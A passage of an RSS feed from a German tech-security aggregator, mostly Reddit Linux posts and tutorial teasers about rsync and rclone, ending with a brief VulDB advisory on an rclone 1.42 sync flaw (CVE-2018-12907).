<description><![CDATA[A couple of years ago I purchased a Hetzner dedicated server and taught myself a bit of sysadmin to the point that I am comfortably provisioning 40 docker containers behind nginx. However, one of my postgreSQL databases got too large for the drive it holding it. Instead of adding another drive it...]]></description>
<link>https://tsecurity.de/de/890700/linux-tipps/still-relatively-new-to-linux-so-im-sure-this-is-common-knowledge-but-rsync-is-awesome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/890700/linux-tipps/still-relatively-new-to-linux-so-im-sure-this-is-common-knowledge-but-rsync-is-awesome/</guid>
<pubDate>Sun, 13 Oct 2019 17:30:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>A couple of years ago I purchased a Hetzner dedicated server and taught myself a bit of sysadmin to the point that I am comfortably provisioning 40 docker containers behind nginx. However, one of my postgreSQL databases got too large for the drive it holding it. Instead of adding another drive it was cheaper to rent a new (much better!) server. </p> <p>I hadn't had much use for rsync up until this point. I was very comfortable with using rclone to back my stuff up to the cloud but had no need for server-to-server ssh transfers. This seemed like a good opportunity to test it out. </p> <p>Just amazing. After some initial hassle setting up a custom ssh port and passwordless root public key, it's running flawlessly and migrated many hundreds of GB across servers. </p> <p><em>TLDR: newbie reminds everyone what they already know: rsync rocks</em></p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/hoocoodanode"> /u/hoocoodanode </a> <br><span><a href="https://www.reddit.com/r/linux/comments/dhbhzq/still_relatively_new_to_linux_so_im_sure_this_is/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/dhbhzq/still_relatively_new_to_linux_so_im_sure_this_is/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[###########OPEN SOURCE SOFTWARE ####### LINUX #############]]></title>
<description><![CDATA[###########OPEN SOURCE SOFTWARE ####### LINUX ############# ​ RCLONE OPEN SOURCE ASSISTANT ExpanDrive ALTERNATIVE: Actively maintained. ​ FREE for : ​ WIN10/8/7.: Apple MAC : UBUNTU : ARCH : MINT : POP_OS : MANJARO : MX_LINUX : KDE-NEON ​ and many DISTROs. ​ Hey! - Jeff from ExpanDrive, ​ Wow you...]]></description>
<link>https://tsecurity.de/de/498257/linux-tipps/open-source-software-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/498257/linux-tipps/open-source-software-linux/</guid>
<pubDate>Tue, 14 May 2019 14:15:11 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>###########OPEN SOURCE SOFTWARE ####### LINUX #############</p> <p>​</p> <p>RCLONE OPEN SOURCE ASSISTANT ExpanDrive ALTERNATIVE: Actively maintained.</p> <p>​</p> <p>FREE for :</p> <p>​</p> <p>WIN10/8/7.: Apple MAC : UBUNTU : ARCH : MINT : POP_OS : MANJARO : MX_LINUX : KDE-NEON</p> <p>​</p> <p>and many DISTROs.</p> <p>​</p> <p>Hey! - Jeff from ExpanDrive,</p> <p>​</p> <p>Wow your product looks amazingleeeeeeey! ........ very similar (exactly)..... to what Open Source Software was has had since 2004(?) (Why that Date) sunmicro?</p> <p>​</p> <p>RCLONE BROWSER</p> <p>​</p> <p>2 second Search: RCLONE GUI [ Looks GREAT! 3 OS PLATFORMS /2 LINUX Distro's + source!</p> <p>​</p> <p>Full disclosure...it's true.</p> <p>​</p> <p>I've never used it. . . . . . . . . . . . . . . . . .you got me, Jeff from Expandrive.</p> <p>​</p> <p>But it is actively maintained at GITGRUB(M$) - has 906 stars - and 98 forks!</p> <p>​</p> <p>(GitGrub Help if you dont understand -<a href="https://help.github.com/en">https://help.github.com/en</a> )</p> <p>​</p> <p><a href="https://martins.ninja/RcloneBrowser/">https://martins.ninja/RcloneBrowser/</a></p> <p>​</p> <p>Download</p> <p>​</p> <p>Get Windows, macOS and Ubuntu package on releases page.</p> <p>​</p> <p>For Ubuntu you can also install it from Launchpad: Rclone Browser.</p> <p>​</p> <p>ArchLinux users can install latest release from AUR repository: rclone-browser.</p> <p>​</p> <p>Other GNU/Linux users will need to build from source.</p> <p>​</p> <p>Its just a browser, Yes, Jeff from ExpanDrive. Not much good without the grunt...</p> <p>​</p> <p>rClone Project - GitHub.</p> <p>​</p> <p><a href="https://github.com/ncw/rclone">https://github.com/ncw/rclone</a></p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/username_murphy"> /u/username_murphy </a> <br><span><a href="https://www.reddit.com/r/linux/comments/boi0zw/open_source_software_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/boi0zw/open_source_software_linux/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Bear necessities]]></title>
<description><![CDATA[futzing around with my third NAS build, Ubuntu Headless server, though my first time running Ubuntu server (instead of Desktop). Any recommended packages? packages installed (by me after 18.0.4 server install) are  ​ fail2ban, pip, python3, youtube-dl, samba, zfs, lftp, rsync, rclone, speedtest-c...]]></description>
<link>https://tsecurity.de/de/434418/linux-tipps/bear-necessities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/434418/linux-tipps/bear-necessities/</guid>
<pubDate>Sat, 22 Dec 2018 07:30:09 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>futzing around with my third NAS build, Ubuntu Headless server, though my first time running Ubuntu server (instead of Desktop). Any recommended packages?</p> <p>packages installed (by me after 18.0.4 server install) are </p> <p>​</p> <pre><code>fail2ban, pip, python3, youtube-dl, samba, zfs, lftp, rsync, rclone, speedtest-cli, openssh, fuse, plexmediaserver, filebot </code></pre> <p>anything else I should consider for a file/media server? I have a crontab for scripts to pull files from seedbox in the wee hours. Though if I am not at home and I download something I want to watch on Plex, I will SSH into NAS at home and manually run the script to pull and process media. </p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/THEdirtyDotterFUCKr"> /u/THEdirtyDotterFUCKr </a> <br><span><a href="https://www.reddit.com/r/linux/comments/a8if1l/bear_necessities/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/a8if1l/bear_necessities/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Bear necessities]]></title>
<description><![CDATA[futzing around with my third NAS build, Ubuntu Headless server, though my first time running Ubuntu server (instead of Desktop). Any recommended packages? packages installed (by me after 18.0.4 server install) are  ​ fail2ban, pip, python3, youtube-dl, samba, zfs, lftp, rsync, rclone, speedtest-c...]]></description>
<link>https://tsecurity.de/de/434419/linux-tipps/bear-necessities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/434419/linux-tipps/bear-necessities/</guid>
<pubDate>Sat, 22 Dec 2018 07:30:09 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>futzing around with my third NAS build, Ubuntu Headless server, though my first time running Ubuntu server (instead of Desktop). Any recommended packages?</p> <p>packages installed (by me after 18.0.4 server install) are </p> <p>​</p> <pre><code>fail2ban, pip, python3, youtube-dl, samba, zfs, lftp, rsync, rclone, speedtest-cli, openssh, fuse, plexmediaserver, filebot </code></pre> <p>anything else I should consider for a file/media server? I have a crontab for scripts to pull files from seedbox in the wee hours. Though if I am not at home and I download something I want to watch on Plex, I will SSH into NAS at home and manually run the script to pull and process media. </p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/THEdirtyDotterFUCKr"> /u/THEdirtyDotterFUCKr </a> <br><span><a href="https://www.reddit.com/r/linux/comments/a8if1l/bear_necessities/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/a8if1l/bear_necessities/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Using Linux to take the suck out of the modern internet]]></title>
<description><![CDATA[I'm bloody fed up with needing JS for links to work, with the demeaning waste-of-existence that is Captcha, with clickbait articles that can't even manage to add anymore journalistic content than what's already in their title, with ads stuffed into everything, with every new website asking if I w...]]></description>
<link>https://tsecurity.de/de/418613/linux-tipps/using-linux-to-take-the-suck-out-of-the-modern-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/418613/linux-tipps/using-linux-to-take-the-suck-out-of-the-modern-internet/</guid>
<pubDate>Sat, 01 Dec 2018 17:30:23 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>I'm bloody fed up with needing JS for links to work, with the demeaning waste-of-existence that is Captcha, with clickbait articles that can't even manage to add anymore journalistic content than what's already in their title, with ads stuffed into everything, with every new website asking if I want it's shitty newsletter, with my tiniest actions and thoughts being monetized by some asshat with MBA, with the muscle spasm for karma or votes, with the drivel that has become public discourse. Obviously Linux can't solve all and probably not most of this but I'm trying to cut out as much tripe as I can from my day.</p> <p>A couple cli tools that are helping:</p> <ul>
<li>html2text -- scripted to download + convert articles to markdown for reading later</li> <li>newsboat/podboat -- darn nice feed reader + podcast client</li> <li>rtv -- cut away much of the crap in Reddit</li> <li>youtube-dl + mpv -- I assume most here know</li> <li>ncmpcpp (mpd), mpsyt (Youtube), pianobar (Pandora) -- music streaming</li> <li>translate-shell -- language translations from various sources</li> <li>neomutt + isync + notmuch -- mail</li> <li>surfraw -- extensible searching of whatever website you want</li> <li>rclone -- Dropbox, Box, etc.</li> </ul>
<p>The weak link in all this is the browser. Inevitably I can't get through a day without needing to decide if I want to fire up FF or w3m. You can do a fair amount with w3m but it can also be annoying/baffling trying to make sense of a web page that's had its css/js formatting ripped out of it. Trying to read forums can be a nightmare but mostly I use it for news in which case every page starts with a long list of sections that you have to scroll past in order to find the actual acticle. Maybe at some point I can muddle together a way to pipe this through Squid or something else in order to clean it up.</p> <p>So I've love to hear what others are doing, ways of auto-downloading stuff and/or decluttering the daily barage of noise that is the Internet. Specialized utilities like rtv would be great, especially for Github comments and various forums or social media, Netflix, hell even tools to browse Amazon, Craigslist, eBay, or whatever would be welcome.</p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/squaredturtles"> /u/squaredturtles </a> <br><span><a href="https://www.reddit.com/r/linux/comments/a24diw/using_linux_to_take_the_suck_out_of_the_modern/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/a24diw/using_linux_to_take_the_suck_out_of_the_modern/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[rsync and rclone - worst case scenario syncing corupted data?]]></title>
<description><![CDATA[This is true that if file will be corrupted that rsync or rclone overide good file with corupted data !? 
   submitted by    /u/vei_1  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/418161/linux-tipps/rsync-and-rclone-worst-case-scenario-syncing-corupted-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/418161/linux-tipps/rsync-and-rclone-worst-case-scenario-syncing-corupted-data/</guid>
<pubDate>Fri, 30 Nov 2018 20:15:30 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<!-- SC_OFF --><div class="md">
<p>This is true that if file will be corrupted that rsync or rclone overide good file with corupted data !?</p> </div>
<!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/vei_1"> /u/vei_1 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/a1v5p8/rsync_and_rclone_worst_case_scenario_syncing/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/a1v5p8/rsync_and_rclone_worst_case_scenario_syncing/">[comments]</a></span>
]]></content:encoded>
</item>
<item>
<title><![CDATA[How To Set Up Rclone For Linux]]></title>
<description><![CDATA[Many cloud services don’t support the Linux platform, so if you’re looking to transfer files back and forth you’ll need to use a third-party solution. There are many types of solutions that enable Linux users to access third-party cloud services (like Google Drive, Backblaze, etc) but Rclone for ...]]></description>
<link>https://tsecurity.de/de/373689/betriebssysteme/how-to-set-up-rclone-for-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/373689/betriebssysteme/how-to-set-up-rclone-for-linux/</guid>
<pubDate>Sun, 16 Sep 2018 19:15:10 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>Many cloud services don’t support the Linux platform, so if you’re looking to transfer files back and forth you’ll need to use a third-party solution. There are many types of solutions that enable Linux users to access third-party cloud services (like Google Drive, Backblaze, etc) but Rclone for Linux is the best by far, as it […]</p>
<p>Read <a rel="nofollow" href="https://www.addictivetips.com/ubuntu-linux-tips/set-up-rclone-for-linux/">How To Set Up Rclone For Linux</a> by <a rel="nofollow" href="https://www.addictivetips.com/author/dderrik/">Derrik Diener</a> on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips - Tech tips to make you smarter</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[How To Set Up Rclone For Linux]]></title>
<description><![CDATA[Many cloud services don’t support the Linux platform, so if you’re looking to transfer files back and forth you’ll need to use a third-party solution. There are many types of solutions that enable Linux users to access third-party cloud services (like Google Drive, Backblaze, etc) but Rclone for ...]]></description>
<link>https://tsecurity.de/de/373674/linux-tipps/how-to-set-up-rclone-for-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/373674/linux-tipps/how-to-set-up-rclone-for-linux/</guid>
<pubDate>Sun, 16 Sep 2018 18:15:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>Many cloud services don’t support the Linux platform, so if you’re looking to transfer files back and forth you’ll need to use a third-party solution. There are many types of solutions that enable Linux users to access third-party cloud services (like Google Drive, Backblaze, etc) but Rclone for Linux is the best by far, as it […]</p>
<p>Read <a rel="nofollow" href="https://www.addictivetips.com/ubuntu-linux-tips/set-up-rclone-for-linux/">How To Set Up Rclone For Linux</a> by <a rel="nofollow" href="https://www.addictivetips.com/author/dderrik/">Derrik Diener</a> on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips - Tech tips to make you smarter</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone 1.42 Sync erweiterte Rechte]]></title>
<description><![CDATA[Eine Schwachstelle wurde in Rclone 1.42 gefunden. Sie wurde als kritisch eingestuft. Davon betroffen ist eine unbekannte Funktion der Komponente Sync. Durch Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Klassifiziert wurde die Schwachstell...]]></description>
<link>https://tsecurity.de/de/333820/sicherheitsluecken/rclone-142-sync-erweiterte-rechte/</link>
<guid isPermaLink="true">https://tsecurity.de/de/333820/sicherheitsluecken/rclone-142-sync-erweiterte-rechte/</guid>
<pubDate>Thu, 28 Jun 2018 08:49:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<p>Eine Schwachstelle wurde in Rclone 1.42 gefunden. Sie wurde als kritisch eingestuft. Davon betroffen ist eine unbekannte Funktion der Komponente <em>Sync</em>. Durch Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Klassifiziert wurde die Schwachstelle durch CWE als <a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269</a>. Mit Auswirkungen muss man rechnen für Vertraulichkeit, Integrität und Verfügbarkeit. CVE fasst zusammen:<br></p>
<blockquote lang="en">In Rclone 1.42, use of "rclone sync" to migrate data between two Google Cloud Storage buckets might allow attackers to trigger the transmission of any URL's content to Google, because there is no validation of a URL field received from the Google Cloud Storage API server, aka a "RESTLESS" issue.</blockquote>
<p>Die Schwachstelle wurde am 27.06.2018 veröffentlicht. Die Identifikation der Schwachstelle findet seit dem 27.06.2018 als <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12907">CVE-2018-12907</a> statt. Es sind weder technische Details noch ein Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet (<a href="https://vuldb.com/?doc.exploitprices">Preisberechnung vom 06/28/2018</a>). </p>
<p></p>
<p>Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.</p>
<p></p>
<h2>CPE</h2>
<ul><li><span><a href="https://vuldb.com/?login">?</a></span></li></ul>
<h2>CVSSv3</h2>
<span>VulDB Meta Base Score</span>: 5.5<br><span>VulDB Meta Temp Score</span>: 5.5<br><br><span>VulDB Base Score</span>: <a href="https://www.first.org/cvss/specification-document#2-Base-Metrics">≈5.5</a><br><span>VulDB Temp Score</span>: <a href="https://www.first.org/cvss/specification-document#3-Temporal-Metrics">≈5.5</a><br><span>VulDB Vector</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><span>VulDB Zuverlässigkeit</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><h2>CVSSv2</h2>
<span>VulDB Base Score</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><span>VulDB Temp Score</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><span>VulDB Zuverlässigkeit</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><br><h2>Exploiting</h2>
<span>Klasse</span>: Erweiterte Rechte (<a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269</a>)<br><span>Lokal</span>: Ja<br><span>Remote</span>: Nein<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Preisentwicklung</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><span>Aktuelle Preisschätzung</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><br><h2>Gegenmassnahmen</h2>
<span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: <span><a href="https://vuldb.com/?login">?</a></span><br><h2>Timeline</h2>
<span>27.06.2018</span>  Advisory veröffentlicht<br><span>27.06.2018</span>  <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12907">CVE zugewiesen</a><br><span>28.06.2018</span>  <a href="https://vuldb.com/?id.120020">VulDB Eintrag erstellt</a><br><span>28.06.2018</span>  <a href="https://vuldb.com/?id.120020">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2>
<br><span>CVE</span>: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12907">CVE-2018-12907</a> (<span><a href="https://vuldb.com/?login">?</a></span>)<br><h2>Eintrag</h2>
<span>Erstellt</span>: 28.06.2018<br><span>Eintrag</span>: <span><a href="https://vuldb.com/?login">?</a></span><br>
]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,10ms -->